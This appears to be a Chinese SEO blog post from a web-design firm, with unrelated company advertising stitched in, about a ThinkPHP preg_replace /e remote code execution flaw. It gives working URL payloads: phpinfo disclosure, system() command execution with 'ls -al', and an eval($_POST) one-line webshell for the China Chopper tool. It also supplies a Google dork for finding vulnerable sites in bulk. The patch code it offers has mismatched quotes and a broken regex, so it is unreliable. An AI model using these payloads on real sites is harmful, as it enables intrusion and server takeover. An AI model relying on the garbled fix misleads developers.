這篇文章主要講解了“如何利用及修復(fù)ThinkPHP框架任意代碼執(zhí)行漏洞”,文中的講解內(nèi)容簡(jiǎn)單清晰,易于學(xué)習(xí)與理解,下面請(qǐng)大家跟著小編的思路慢慢深入,一起來(lái)研究和學(xué)習(xí)“如何利用及修復(fù)ThinkPHP框架任意代碼執(zhí)行漏洞”吧!
創(chuàng)新互聯(lián)公司服務(wù)項(xiàng)目包括久治網(wǎng)站建設(shè)、久治網(wǎng)站制作、久治網(wǎng)頁(yè)制作以及久治網(wǎng)絡(luò)營(yíng)銷策劃等。多年來(lái),我們專注于互聯(lián)網(wǎng)行業(yè),利用自身積累的技術(shù)優(yōu)勢(shì)、行業(yè)經(jīng)驗(yàn)、深度合作伙伴關(guān)系等,向廣大中小型企業(yè)、政府機(jī)構(gòu)等提供互聯(lián)網(wǎng)行業(yè)的解決方案,久治網(wǎng)站推廣取得了明顯的社會(huì)效益與經(jīng)濟(jì)效益。目前,我們服務(wù)的客戶以成都為中心已經(jīng)輻射到久治省份的部分城市,未來(lái)相信會(huì)繼續(xù)擴(kuò)大服務(wù)區(qū)域并繼續(xù)獲得客戶的支持與信任!近期thinkphp框架爆出了一個(gè)任意代碼執(zhí)行漏洞,其危害性相當(dāng)?shù)母?漏洞利用方法如下:
index.php/module/aciton/param1/${@print(THINK_VERSION)} index.php/module/aciton/param1/${@function_all()}
其中的function_all代表任何函數(shù),比如:
index.php/module/aciton/param1/${@phpinfo()}
就可以獲取服務(wù)器的系統(tǒng)配置信息等。
index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al
可以列出網(wǎng)站文件列表
index.php/module/action/param1/{${eval($_POST[s])}}
就可以直接執(zhí)行一句話代碼,用菜刀直接連接.
這樣黑客們就可以直接通過(guò)google批量搜索關(guān)鍵字:thinkphp intitle:系統(tǒng)發(fā)生錯(cuò)誤 來(lái)獲取更多使用thinkphp框架的網(wǎng)站列表??梢?jiàn)其危害性相當(dāng)?shù)拇蟆?br/>
thinkphp框架執(zhí)行任意代碼漏洞修復(fù)方法:
用戶可下載官方發(fā)布的補(bǔ)丁:
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
或者或者直接修改源碼:
將/ThinkPHP/Lib/Core/Dispatcher.class.php文件中的
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
修改為:
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths));
將preg_replace第二個(gè)參數(shù)中的雙引號(hào)改為單引號(hào),防止其中的php變量語(yǔ)法被解析執(zhí)行。
感謝各位的閱讀,以上就是“如何利用及修復(fù)ThinkPHP框架任意代碼執(zhí)行漏洞”的內(nèi)容了,經(jīng)過(guò)本文的學(xué)習(xí)后,相信大家對(duì)如何利用及修復(fù)ThinkPHP框架任意代碼執(zhí)行漏洞這一問(wèn)題有了更深刻的體會(huì),具體使用情況還需要大家實(shí)踐驗(yàn)證。這里是創(chuàng)新互聯(lián)網(wǎng)站建設(shè)公司,,小編將為大家推送更多相關(guān)知識(shí)點(diǎn)的文章,歡迎關(guān)注!